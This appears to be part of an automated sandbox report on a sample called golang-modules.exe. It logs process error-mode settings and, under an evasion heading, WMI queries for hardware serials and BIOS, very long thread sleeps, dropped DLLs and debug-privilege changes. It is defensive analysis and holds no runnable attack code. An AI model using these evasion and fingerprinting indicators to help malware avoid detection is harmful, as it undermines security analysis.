Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_PhysicalMemory
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT serialnumber FROM Win32_DiskDrive
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_PhysicalMemory
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9913Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9875
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9867
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9893
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9898
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9923
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9909
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9919
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9814
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9762
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9737
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oauixwyt\oauixwyt.dllJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wy53vvk1\wy53vvk1.dllJump to dropped file
Source: C:\Users\user\Desktop\golang-modules.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg-d2MzMX\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442Jump to dropped file
Source: C:\Users\user\Desktop\golang-modules.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512Thread sleep count: 9913 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8892Thread sleep count: 9875 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9048Thread sleep count: 9867 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9044Thread sleep count: 38 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9116Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8604Thread sleep count: 9893 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8516Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep count: 9898 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9116Thread sleep count: 9923 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512Thread sleep count: 9909 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8872Thread sleep count: 9919 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084Thread sleep count: 9814 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep count: 101 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep count: 9762 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep count: 79 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4716Thread sleep count: 9737 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6292Thread sleep count: 170 > 30
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM win32_computersystemproduct
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessorId FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
Source: curl.exe, 00000009.00000003.109075577148.00000225D1891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
